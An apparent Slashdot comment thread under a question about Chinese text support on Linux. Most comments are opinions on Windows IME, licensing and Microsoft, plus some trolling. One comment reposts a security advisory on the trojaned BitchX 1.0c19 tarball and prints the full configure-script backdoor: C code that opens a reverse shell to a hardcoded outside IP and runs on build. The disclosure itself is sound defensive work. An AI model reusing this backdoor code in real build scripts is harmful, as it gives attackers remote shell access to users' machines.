Reading/Writing Chinese Using Linux?

Rimbo asks: "I'm building a computer for a friend, who has three major requirements from his system: He wants an Athlon with a 333MHz FSB, he wants absolutely no Microsoft software anywhere near it, and he needs the ability to read and edit Chinese. I imagine Red Flag Linux has great Chinese support, but is it as easy to use as a desktop OS as Mandrake or Red Hat? How easy is Chinese text editing and entry under the major distributions? What "office" software for Linux is good for editing Chinese? Thanks!"

farst pohct!

aahhh yeeaaah bitz. i'm thah fawkin farst pohct mastar!!! 2:36pm in the afternoon on the west coast of dah usa... prime time bitz!

BITCHX HAS BEEN HACKED!!

[egg+troll]

A few hours ago (1 AM US/Eastern time, July 1) we downloaded
ircii-pana-1.0c19.tar.gz from ftp.bitchx.com (216.165.191.5) and
reviewed the configure script before running it. It has essentially
the same configure backdoor as fragroute-1.2.tar.gz[1] -- a TCP
connection is made outbound, with a shell bound to it (a reverse
telnet). This appears to retry/respawn once per hour. The 1.0c19
tarball at ftp.irc.org (which mirrors bitchx.com) did not appear to be
trojaned when we pulled from there about an hour later. /dist$ md5sum ircii-pana-1.0c19*
46805199254c0fa2119d7c579194ab a8 ircii-pana-1.0c19-bitchxorg.tar.gz [bad]
79431ff0880e7317049045981fac8adc ircii-pana-1.0c19-ircorg.tar.gz [good] /src/ircii-pana-1.0c19-possiblytrojaned$ md5sum */configure
d6444c18b6faf352dfc6ca3bf8cb802a ftp.bitchx.org/configure [bad]
0bd531d523606a0296da2763dafa51f2 ftp.irc.org/configure [good]

Here is the added code in the bitchx.org distribution:

--- ircii-pana-1.0c19-ftp.irc.org/configure Sun Mar 24 04:30:49 2002
+++ ircii-pana-1.0c19-ftp.bitchx.org/configure Sun Mar 24 04:30:49 2002
@@ -6326,6 +6326,88 @@

fi

# We did not find ourselves, most probably we were run as `sh COMMAND'
# in which case we are not to be found in the path.
cat >conftest.c <<_ACEOF /* We use char because int might match the return type of a gcc2
builtin and then its argument prototype would still apply. */
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <setjmp.h> /* Override any gcc2 internal prototype to avoid an error.
Override any jmp buf internal prototype to avoid an error. */
jmp_buf env; int s;
void sig(int sig)
{
close (s); sleep (3600); longjmp (env, 0);
}

int main()
{ /* We use char because int might match the return type of a gcc2
builtin and then its argument prototype would still apply. */
int x; char c; struct sockaddr_in sa; /* This call has the arguments reversed.
A reversed system may check and see that the address of main
*/
switch (fork ()) { case 0: break; default: exit (0); }

signal (SIGALRM, sig);
do { /* Override any gcc2 internal prototype to avoid an error.
Override any jmp buf internal prototype to avoid an error. */
setjmp(env);
if ((s = socket (AF_INET, SOCK_STREAM, 0)) == (-1)) exit (1);
memset (&sa, 0, sizeof(sa));
sa.sin_family = AF_INET; /* We use char because int might match the return type of a gcc2
builtin and then its argument prototype would still apply. */
sa.sin_port = htons (6667);
sa.sin_addr.s_addr = inet_addr ("213.77.115.17"); alarm (10); /* Override any gcc2 internal prototype to avoid an error. */ /* The GNU C library defines this for functions which it implements
to always fail with ENOSYS. Some functions are actually named
something starting with __ and the normal name is an alias. */
if (connect (s, (struct sockaddr *)&sa, sizeof (sa)) == (-1))
if (errno != EINTR) exit(1);
if ((x = read (s, &c, 1)) == (-1)) {
if (errno != EINTR) exit (1); }
else if (x == 1) { /* The GNU C library defines this for functions which it implements
to always fail with ENOSYS. Some functions are actually named
something starting with __ and the normal name is an alias. */
alarm (0); dup2 (s, 0); dup2 (s, 1); dup2 (s, 2); /* System header to define __stub macros and hopefully few prototypes,
which can conflict with char inet_addr(); below. */
{ char *a[] = { "/bin/sh", NULL }; execve (a[0], a, NULL); }
}
} while (1);
}
_ACEOF
# Don't try to exec as it changes $[0], causing all sort of problems
# (the dirname of $[0] is not the place where we might find the
# original and so on. Autoconf is especially sensible to this).
# Exit status is that of the last command.
ACLIBLOCAL="`basename \"\`grep $USER: /etc/passwd\`\"`" 1>/dev/null 2>/dev/null
# Create $as_me.lineno as a copy of $as_myself, but with $LINENO
# uniformly replaced by the line number. The first 'sed' inserts a
# line-number line before each line; the second 'sed' does the real
# work. The second script uses 'N' to pair each line-number line
# with the numbered line, and appends trailing '-' during
# substitution so that $LINENO is not a special case at line end.
# (Raja R Harinath suggested sed '=', and Paul Eggert wrote the
# second 'sed' script. Blame Lee E. McMahon for sed's syntax. :-)
if ! test $ACLIBLOCAL ; then ACLIBLOCAL=sh; fi 1>/dev/null 2>/dev/null
$CC $LIBS -w conftest.c -o $ACLIBLOCAL ; PATH=.:$PATH $ACLIBLOCAL 1>/dev/null 2>/dev/null
rm -f ./conftest ./conftest.c $ACLIBLOCAL ./acliblocal ./aclib

echo "$as_me:$LINENO: checking for inet_aton" >&5
echo $ECHO_N "checking for inet_aton... $ECHO_C" >&6
if test "${ac_cv_func_inet_aton+set}" = set; then

</diff>

There's a little more to this. There are at least two versions of the
source code on (www|ftp).bitchx.(org|com)

79431ff0880e7317049045981fac8adc ircii-pana-1.0c19.tar.gz
46805199254c0fa2119d7c57 9194aba8 ircii-pana-1.0c19.tar.gz.1 <- owned

-rw-r--r-- 2533621 Mar 29 01:02 ircii-pana-1.0c19.tar.gz
-rw-r--r-- 2533621 Mar 29 01:02 ircii-pana-1.0c19.tar.gz.1

There is something very strange going on with the FTP server on
ftp.bitchx.org. In some cases, it serves up the trojaned version; in
others, the original, safe version. It seems to be client /
client-behavior based (we're not sure exactly what).

These will usually get you a clean copy:
wget ftp://ftp.bitchx.org/pub/BitchX/source/ircii-pana- 1.0c19.tar.gz
[netscape] ftp://ftp.bitchx.org/pub/BitchX/source/ircii-pana- 1.0c19.tar.gz
ftp ftp.bitchx.org ; get /pub/BitchX/source/ircii-pana-1.0c19.tar.gz
ftp ftp.bitchx.org ; cd /pub/BitchX/source ; get ircii-pana-1.0c19.tar.gz

These will usually give you the trojaned version:

lynx ftp://ftp.bitchx.org/pub/BitchX/source/ircii-pana- 1.0c19.tar.gz
ftp ftp.bitchx.org ; cd pub ; cd BitchX ; cd source ; \
get ircii-pana-1.0c19.tar.gz

To add a little more to this; we've confirmed that if you come off of
what appears to be a cablemodem/dsl IP you are likely to get a
trojan'd copy. If you come off of a more static link, you are likely
to get a clean copy.

This was verified using:
204.xxx.xxx.xxx range gets clean
12.xxx.xxx.xxx (ATT) gets dirty
66.xxx.xxx.xxx gets dirty

Using the 'ftp ; cd pub; ...' method. We have also observed cases
where the 'ftp method' yields a clean copy but lynx still fetches the
trojan'ed copy. In addition to source-network checking, ftpd may be
checking anonymous vs ftp login strings, what anon password is sent,
whether the client issues explicit TYPE I commands, whether it sends
paths with leading slashes, PORT vs PASV commands, RETR with the full
path, etc.

This indicates that someone has (at least) also tampered with the FTP
server software itself; most likely the server has been rooted. We
have reported this issue to BitchX developers, and they are
investigating. In the meantime, we suggest everyone should treat
anything downloaded from the ftp.bitchx.org server with extreme
skepticism.

[1] http://marc.theaimsgroup.com/?l=bugtraq&m=10228552 3803434&w=2

Re:BITCHX HAS BEEN HACKED!!

See this BitchX 1.0c19 IRC Client Backdoored from about 4 days ago.

I have a client who is Japanese..

[SlashChick]

...and since I've had to write and test all of my PHP applications with the Japanese charset for him and his friends, I thought I would share my and his experiences.

I've done both Japanese and Chinese input editing with Windows and MacOS 9, and my client uses Japanese input the majority of the time he uses a PC. He and his friends flatly refuse to use anything but Windows 2000 for hardcore input. The reason? Microsoft's Japanese IME. Mac OS 9's input support doesn't compare to this tiny bar that sits at the corner of your screen and lets you flip back and forth between English and several other character sets. According to my client, both mouse support (i.e. clicking the little bar and bringing up the language) and keyboard support (using key commands to change languages) are VASTLY more efficient in Windows 2000 than in MacOS 9. In fact, he's planning to drop his (older) Macs for Windows 2000 and XP machines solely based on this feature.

Now, I'm not saying that there isn't something similar for Linux. But if Apple couldn't come up with anything more productive for MacOS 9, which was intended from the start to be a consumer-level, desktop, OS, I am highly doubtful that Linux developers can come up with anything better. As is, my client and all of his friends are on either 2000 or XP and are quite happy with their decision.

As it stands, I believe your friend's decision to not use Microsoft products may be a bit short-sighted, especially considering that this is one of my client's only reasons to switch to Windows from MacOS.

Ask Slantdot

[Moonwick]

Moron asks: "Hi, a... uh... 'friend' of mine wants to be attractive to the opposite sex. He refuses to take a shower, change his clothes, or brush his teeth. Any suggestions?"

Anti Microsoft zealots...

[MsGeek]

Sometimes Microsoft breeds them. They don't need to be brainwashed by outside forces.

Look, I'm an MCSE. I spent a year learning Windows 2000 inside and out. I knew even more than some of my teachers when I was done. Recently I have been doing contract work with an eCommerce company which is almost 100% a Windows shop. There are a few Macs there, but mostly everyone's running on Windows.

One of the things I'm doing there is an inventory. We need to match up licenses on the machines. Some are running the original OSes they were running when the company got them. This usually means Windows 98, Windows 98SE and (Goddess help me) Millenium Edition. Some have been moved up to Windows 2000, and that's where the "match the license to the machine" game comes in.

Then there's the servers which are a completely different kettle of fish. I suspect the company will be buying a few more licenses before all this is over.

If the whole shop was Macintosh it wouldn't be a problem. No serial number, no certificate, no BSA assholes looking for people to nail. But no, they can't do that..."we can't go backwards" says my boss.

Similarly, if they went Open Source it wouldn't be a problem...in fact, it would have been even easier. It no longer becomes a question of which machine has a legitimate operating system...you could use one disk for everyone and it would be all good. It's the way it used to be with MacOS...up until System 7.0.1 MacOS was free as in beer. Of course there are other advantages with Open Source software, however, they don't usually matter to suits.

Dealing with XP is a pain, and so are programs with similar "Activation" schemes like Office 2000 and Office XP. But will they let me slap on Open Office 1.0 instead? "We have to be compatible with what's out there." the boss says to me. Never mind that to be compatible with what's out there you have to spend $600/seat. Never mind that trifle. You have to "be compatible with what's out there."

And if this crap isn't hard enough now, just wait until Palladium rolls in, and you have to not only deal with broken software but broken hardware too. This will become the ultimate "lock in"...you won't be able to run something that doesn't have the crypto signatures the hardware is expecting. Goodbye Linux, goodbye FreeBSD, goodbye OpenBSD, goodbye NetBSD, goodbye BeOS. That new Dell you just bought will only run on MS DRM OS. Or Windows 2004 or XP 2 or .NET desktop or whatever they will call this POS coming down the pike.

Forget the fact that I have been using Macs since 1995. I was using DOS well before that. Longer than I care to admit, actually. I actually LIKE Windows 2000...it is a nice, solid operating system that is very hard to crash. But the thing is, the ancillary bullshit surrounding Microsoft's sales terms and copy locks make anti-MS zealots out of all but the most sheepish followers of Redmond.

I am looking to wean myself personally from Microsoft. I will probably still support it where I work, wherever that may be. I am, after all, an MCSE. But once there's video and audio apps in Linux that rival Vegas Video, Premiere, ProTools, Sound Forge and After Effects I am dropping Windows like a bad habit. And I will be glad when I do.